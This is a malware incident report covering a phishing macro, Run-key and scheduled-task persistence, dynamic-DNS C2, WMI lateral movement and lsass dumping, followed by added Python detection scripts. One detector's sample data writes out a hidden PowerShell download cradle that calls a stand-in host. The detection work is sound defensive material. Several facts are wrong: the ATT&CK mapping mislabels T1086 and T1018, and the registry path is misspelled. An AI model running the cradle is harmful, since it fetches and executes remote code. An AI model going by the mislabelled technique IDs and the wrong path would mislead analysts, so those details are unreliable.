Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- Custom malware was delivered through a phishing email disguised as a document.
- The implant exhibited multiple persistence mechanisms, including registry modifications and scheduled tasks.
- Infrastructure associated with the C2 was identified, showing signs of rapid changes and IP rotation.
Executive Summary
This analysis delves into a recent incident where a targeted phishing attack led to the deployment of a bespoke malware strain. Our investigation focused on understanding the methods deployed by the threat actor, the various stages of the attack lifecycle, and the eventual impact on the compromised environment. Initial access was achieved through a convincing spear-phishing email that enticed users to open a malicious attachment.
Initial Access
The attack vector began with a carefully crafted phishing email, which purported to be a legitimate document from a trusted source. Upon clicking the attachment, the victim inadvertently executed a macro embedded within a Microsoft Office document. This macro executed a PowerShell command that downloaded the primary payload from a remote server. Our examination revealed that the payload was an executable file, capable of establishing persistence.
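The chain described above (Office document, macro, PowerShell download cradle) leaves a distinctive process-creation trace. The following is an added example, not code from the report or its author, that scores Sysmon-style process-creation events for an Office parent spawning a script host and for cradle traits in the command line. Field names follow Sysmon Event ID 1; the sample events, the scoring threshold and the pattern list are assumptions for illustration, not telemetry from the incident.

```python
"""Added example, not from the report: flag Office-spawned script hosts and
PowerShell download cradles in process-creation telemetry.

Event fields mimic Sysmon Event ID 1 (ParentImage, Image, CommandLine).
All sample events are constructed for illustration, not incident telemetry.
"""
import re
from typing import Iterable

# Office binaries that have no business launching a script host or shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line traits typical of a download-and-run cradle.
CRADLE_PATTERNS = {
    "download-api": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "encoded-command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden-window": re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    "policy-bypass": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
}

# Constructed sample: one macro-style cradle, one admin one-liner, and one
# Outlook child that is unusual but carries no cradle traits.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://stage.example/s1')\""},
    {"ProcessId": 4188,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\Users\""},
    {"ProcessId": 4201,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo hello"},
]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event.

    One point when an Office application spawns a script host, plus one
    point per cradle trait found in the command line.
    """
    reasons: list[str] = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office-parent:{parent}->{image}")
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(cmd):
            reasons.append(name)
    return len(reasons), reasons


def find_suspicious(events: Iterable[dict], threshold: int = 2) -> list[dict]:
    """Return the events whose score meets the threshold, annotated with reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit["ProcessId"], hit["score"], hit["reasons"])
```

The threshold of two keeps a lone Office-to-cmd.exe spawn (common with some add-ins) below the alert line while the macro cradle scores four; in production the parent and command-line checks would normally be two separate rules so that each can be tuned on its own.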
Execution & Persistence
The sample we examined implemented multiple techniques to ensure persistence. Post-execution, it modified the registry at HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run to include a reference to its executable, ensuring it executed on every user login. Additionally, a scheduled task was created under Task Scheduler\Microsoft\Windows\TaskScheduler to invoke the malware periodically, demonstrating a robust method to maintain its foothold.
Command and Control
Upon installation, the implant initiated communication with its command and control (C2) server, utilizing HTTP requests to exfiltrate data and receive further instructions. The C2 communications were observed to utilize dynamic DNS, with the actor employing a series of rapidly rotating IP addresses to obfuscate their infrastructure. The HTTP user agent strings appeared to mimic commonly used browsers, further masking the malicious traffic. During the investigation, we mapped the observable artifacts to known infrastructure, revealing numerous domains associated with recent reported campaigns.
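The C2 traits described above (HTTP beaconing, dynamic DNS, rapidly rotating IP addresses) can be surfaced from ordinary web-proxy logs without any knowledge of the implant. The following is an added example, not code from the report or its author, that groups requests by client and host and flags regular inter-request timing, many distinct destination IPs for one hostname, and known dynamic-DNS suffixes. The log format, the sample lines, the thresholds and the suffix list are assumptions for illustration; the hostname in the sample uses the reserved .example TLD so that no real host appears.

```python
"""Added example, not from the report: spot beaconing to dynamic-DNS hosts
with rotating destination IPs in web-proxy logs.

Log format and every line below are constructed for illustration:
  <ISO-8601 UTC time> <client-ip> <method> <host> <dest-ip> "<user-agent>"
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Real dynamic-DNS provider suffixes plus a reserved .example suffix used by
# the constructed sample; extend from threat-intel feeds in practice.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "dyndns.example")

CHROME_UA = '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"'

# Constructed sample: 10.0.0.5 checks in roughly every 60 s and the hostname
# resolves to three different addresses; 10.0.0.6 browses normally.
SAMPLE_LOG = "\n".join([
    f"2024-05-01T10:00:00Z 10.0.0.5 GET beacon.dyndns.example 203.0.113.10 {CHROME_UA}",
    f"2024-05-01T10:01:02Z 10.0.0.5 GET beacon.dyndns.example 203.0.113.10 {CHROME_UA}",
    f"2024-05-01T10:01:58Z 10.0.0.5 GET beacon.dyndns.example 203.0.113.20 {CHROME_UA}",
    f"2024-05-01T10:03:01Z 10.0.0.5 GET beacon.dyndns.example 203.0.113.20 {CHROME_UA}",
    f"2024-05-01T10:04:00Z 10.0.0.5 GET beacon.dyndns.example 198.51.100.7 {CHROME_UA}",
    f"2024-05-01T10:04:59Z 10.0.0.5 GET beacon.dyndns.example 198.51.100.7 {CHROME_UA}",
    f"2024-05-01T10:06:03Z 10.0.0.5 GET beacon.dyndns.example 203.0.113.10 {CHROME_UA}",
    f"2024-05-01T10:07:00Z 10.0.0.5 GET beacon.dyndns.example 203.0.113.20 {CHROME_UA}",
    f"2024-05-01T10:00:05Z 10.0.0.6 GET www.example.com 198.51.100.1 {CHROME_UA}",
    f"2024-05-01T10:00:09Z 10.0.0.6 GET www.example.com 198.51.100.1 {CHROME_UA}",
    f"2024-05-01T10:03:40Z 10.0.0.6 GET www.example.com 198.51.100.1 {CHROME_UA}",
    f"2024-05-01T10:11:02Z 10.0.0.6 GET www.example.com 198.51.100.1 {CHROME_UA}",
    f"2024-05-01T10:12:30Z 10.0.0.6 GET www.example.com 198.51.100.1 {CHROME_UA}",
    f"2024-05-01T10:30:00Z 10.0.0.6 GET www.example.com 198.51.100.1 {CHROME_UA}",
])


def parse_line(line: str) -> dict:
    """Split one constructed proxy-log line into its fields."""
    ts, client, method, host, dest, ua = line.split(" ", 5)
    return {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "method": method, "host": host.lower(), "dest": dest, "ua": ua.strip('"')}


def analyse(lines, min_requests: int = 6, max_cov: float = 0.2, min_ips: int = 3) -> list[dict]:
    """Return (client, host) pairs that show at least two C2-like traits.

    regular-interval: coefficient of variation of the gaps between requests
    is at most max_cov (beacons keep a near-constant period, browsing does not).
    ip-rotation: one hostname seen with min_ips or more destination addresses.
    dynamic-dns: hostname under a dynamic-DNS provider suffix.
    """
    groups: dict[tuple[str, str], list[dict]] = defaultdict(list)
    for line in lines:
        if line.strip():
            rec = parse_line(line)
            groups[(rec["client"], rec["host"])].append(rec)

    findings = []
    for (client, host), recs in groups.items():
        reasons = []
        recs.sort(key=lambda r: r["time"])
        if len(recs) >= min_requests:
            gaps = [(b["time"] - a["time"]).total_seconds() for a, b in zip(recs, recs[1:])]
            mean = statistics.mean(gaps)
            if mean > 0 and statistics.stdev(gaps) / mean <= max_cov:
                reasons.append(f"regular-interval:{mean:.0f}s")
        dests = {r["dest"] for r in recs}
        if len(dests) >= min_ips:
            reasons.append(f"ip-rotation:{len(dests)}")
        if host.endswith(DYNDNS_SUFFIXES):
            reasons.append("dynamic-dns")
        if len(reasons) >= 2:
            findings.append({"client": client, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG.splitlines()):
        print(f)
```

The user-agent string is parsed but deliberately not scored: a proxy log alone cannot tell a browser from an implant that copies a browser's User-Agent, which is the masking the report describes. Joining the proxy record to endpoint telemetry (which process opened the connection) is what turns that mimicry into a detectable mismatch.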
Lateral Movement & Discovery
After establishing a presence within the network, the malware included functionality for lateral movement. We noted evidence of the actor attempting to leverage Windows Management Instrumentation (WMI) via T1086 – PowerShell Remoting to spread the malware across connected hosts. Additionally, the implant included enumeration capabilities to discover other machines within the domain, ultimately aiming to capture credentials for further access. Credential dumping techniques were also observed, particularly targeting lsass.exe, which is indicative of the actor’s goal to escalate their privileges and gain domain administrator access.
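Both post-compromise behaviours described above, reading lsass.exe memory and executing through WMI, produce well-defined host events. The following is an added example, not code from the report or its author, with two checks over Sysmon-style events: a ProcessAccess (Event ID 10) check that flags non-system processes opening lsass.exe with a read-capable access mask, and a ProcessCreate (Event ID 1) check for processes whose parent is the WMI provider host. The sample events, the access-mask bits and the allowlists are assumptions for illustration, and the allowlists in particular must be tuned to the environment.

```python
"""Added example, not from the report: checks for lsass.exe memory access and
WMI-spawned processes over Sysmon-style events.

Field names follow Sysmon Event ID 10 (ProcessAccess) and Event ID 1
(ProcessCreate). Every event below is constructed, not incident telemetry.
"""

# Win32 process access rights; memory-dumping tools need PROCESS_VM_READ.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# System components that legitimately open lsass.exe. They are matched by
# name AND by location, so a same-named binary in a user directory still fires.
LSASS_READER_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe",
                          "lsass.exe", "msmpeng.exe", "svchost.exe"}
SYSTEM_DIR = "c:\\windows\\system32\\"

# Children the WMI provider host is expected to launch (assumption; tune locally).
WMI_CHILD_ALLOWLIST = {"werfault.exe"}

SAMPLE_EVENTS = [
    # A renamed binary in Temp opens lsass with VM_READ -> finding.
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # csrss.exe from System32 with full access -> allowlisted.
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    # Task Manager queries limited information only (no VM_READ) -> ignored.
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    # WmiPrvSE.exe launching PowerShell on the host -> finding.
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Windows\Temp\update.ps1"},
    # Ordinary service start -> ignored.
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lsass_access_finding(event: dict):
    """Flag a non-system process opening lsass.exe with a read-capable mask."""
    if event.get("EventID") != 10:
        return None
    if _basename(event.get("TargetImage", "")) != "lsass.exe":
        return None
    source = event.get("SourceImage", "")
    trusted = (_basename(source) in LSASS_READER_ALLOWLIST
               and source.lower().startswith(SYSTEM_DIR))
    if trusted:
        return None
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    if mask & PROCESS_VM_READ or mask == PROCESS_ALL_ACCESS:
        return {"rule": "lsass-memory-read", "source": source, "access": hex(mask)}
    return None


def wmi_exec_finding(event: dict):
    """Flag a process spawned by the WMI provider host, the usual sign of
    remote WMI process creation landing on this machine."""
    if event.get("EventID") != 1:
        return None
    if _basename(event.get("ParentImage", "")) != "wmiprvse.exe":
        return None
    image = event.get("Image", "")
    if _basename(image) in WMI_CHILD_ALLOWLIST:
        return None
    return {"rule": "wmi-spawned-process", "image": image,
            "command": event.get("CommandLine", "")}


def scan(events) -> list[dict]:
    """Run both checks over an event stream and collect the findings."""
    findings = []
    for ev in events:
        for f in (lsass_access_finding(ev), wmi_exec_finding(ev)):
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

The path-qualified allowlist is the part worth copying: allowing "svchost.exe" by name alone would have silenced the Temp-directory sample, which is exactly the masquerade an implant uses. On the WMI side the rule fires on the receiving host, so it is the one that catches lateral movement into machines where the source host's logs are unavailable.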
Impact & Objectives
The primary objective of the threat actor appeared to be the exfiltration of sensitive data. Our analysis disclosed evidence of targeted file access, specifically searching for documents and other sensitive information typically found in corporate environments. The implant was seen packaging this data and sending it back to the C2 server in encrypted form, making detection more challenging. The potential impact of this malicious activity included severe data breaches, leading to extensive reputational damage and financial loss for the compromised organization.
MITRE ATT&CK Mapping
- T1566 – Phishing: The initial access was achieved through a malicious email containing a document with a macro.
- T1059.001 – PowerShell: The malware utilized PowerShell scripts to execute commands upon execution.
- T1071.001 – Application Layer Protocol: Web Protocols: C2 communications were established over HTTP.
- T1018 – Remote Services: RDP: The actor attempted lateral movement through WMI.
Detection Opportunities
- Monitor for unusual registry changes under HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run.
- Implement network filtering rules to block known malicious domains used for C2.
- Employ anomaly detection on scheduled tasks to identify non-standard creation patterns.
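The two persistence mechanisms described in Execution & Persistence, and the registry and scheduled-task monitoring called for in the list above, share one detection shape: an autostart entry whose target lives somewhere a user can write to. The following is an added example, not code from the report or its author, that applies that check to Sysmon-style registry value-set events (Event ID 13) and to Windows Security scheduled-task creation events (4698, task XML in TaskContent). The Run-key match accepts both the key spelling used in this report (...\Windows\Current\Run) and the standard ...\Windows\CurrentVersion\Run path; the sample events, the path patterns and the repetition threshold are assumptions for illustration.

```python
"""Added example, not from the report: flag Run-key values and scheduled
tasks that point at user-writable paths or repeat on a short interval.

Inputs mimic Sysmon Event ID 13 (registry value set) and Security Event 4698
(scheduled task created). Every event below is constructed.
"""
import re
import xml.etree.ElementTree as ET

# Accepts both "...\Windows\Current\Run" (as written in this report) and
# "...\Windows\CurrentVersion\Run", plus the RunOnce variants.
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\current(version)?\\run(once)?\\", re.I)
# Directories any user can write to; legitimate autostarts rarely live here.
USER_WRITABLE_RE = re.compile(r"\\(users\\[^\\]+\\appdata|users\\public|windows\\temp|programdata)\\", re.I)
# Installers that normally write Run values (assumption; tune locally).
TRUSTED_WRITERS = {"explorer.exe", "msiexec.exe"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SHORT_REPEAT_MINUTES = 30

TASK_XML = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
    "<Triggers><TimeTrigger><Repetition><Interval>{interval}</Interval></Repetition>"
    "<StartBoundary>2024-05-01T10:05:00</StartBoundary></TimeTrigger></Triggers>"
    "<Actions><Exec><Command>{command}</Command></Exec></Actions></Task>"
)
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"  # constructed SID

SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\jdoe\AppData\Local\Temp\inst.exe",
     "TargetObject": rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate",
     "Details": r"C:\Users\jdoe\AppData\Roaming\svc\updater.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\WinUpdate",
     "TaskContent": TASK_XML.format(interval="PT10M",
                                    command=r"C:\Users\jdoe\AppData\Roaming\svc\updater.exe")},
    {"EventID": 4698, "TaskName": r"\Vendor\Maintenance",
     "TaskContent": TASK_XML.replace("<Repetition><Interval>{interval}</Interval></Repetition>", "")
                            .format(command=r"C:\Program Files\Vendor\maint.exe")},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _interval_minutes(iso: str):
    """Minutes in an ISO 8601 duration such as PT10M or P1DT2H (None if unparsable)."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", iso.strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def run_key_finding(event: dict):
    """Record every autostart value set; raise severity on suspicious traits."""
    if event.get("EventID") != 13 or not RUN_KEY_RE.search(event.get("TargetObject", "")):
        return None
    reasons = ["autostart-value-set"]
    if USER_WRITABLE_RE.search(event.get("Details", "")):
        reasons.append("user-writable-path")
    writer = _basename(event.get("Image", ""))
    if writer not in TRUSTED_WRITERS:
        reasons.append(f"untrusted-writer:{writer}")
    return {"rule": "run-key", "value": event["TargetObject"].rsplit("\\", 1)[-1],
            "command": event.get("Details", ""), "reasons": reasons,
            "severity": "high" if len(reasons) > 1 else "info"}


def scheduled_task_finding(event: dict):
    """Flag tasks whose action lives in a user-writable path or that repeat often."""
    if event.get("EventID") != 4698:
        return None
    xml = re.sub(r"^\s*<\?xml[^>]*\?>", "", event["TaskContent"])  # drop the UTF-16 declaration
    root = ET.fromstring(xml)
    commands = [c.text or "" for c in root.iterfind(".//t:Exec/t:Command", TASK_NS)]
    reasons = ["user-writable-path" for c in commands if USER_WRITABLE_RE.search(c)]
    for node in root.iterfind(".//t:Repetition/t:Interval", TASK_NS):
        minutes = _interval_minutes(node.text or "")
        if minutes is not None and minutes <= SHORT_REPEAT_MINUTES:
            reasons.append(f"short-repeat:{minutes:g}m")
    if not reasons:
        return None
    return {"rule": "scheduled-task", "name": event.get("TaskName"),
            "commands": commands, "reasons": reasons, "severity": "high"}


def scan_persistence(events) -> list[dict]:
    findings = []
    for ev in events:
        for f in (run_key_finding(ev), scheduled_task_finding(ev)):
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_persistence(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], f["reasons"])
```

Every Run-key write is kept at least at "info" so that a baseline of normal autostart entries builds up; the "high" findings are the ones where the writer, the target path, or a short task repetition (beacon-like, as in the 10-minute sample) departs from that baseline, which is the anomaly-on-creation-pattern approach the last bullet above asks for.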
Analyst Notes
Continuous monitoring and enhancement of security awareness training for employees is critical in mitigating phishing attempts. Regular penetration testing and red teaming exercises should also be conducted to assess the readiness of the organization against such sophisticated attacks. Employing multifactor authentication can significantly reduce the risk of credential theft through lateral movement techniques. Additionally, the use of EDR solutions can enhance visibility into process executions, and the tracking of PowerShell usage can highlight potential indicators of compromise.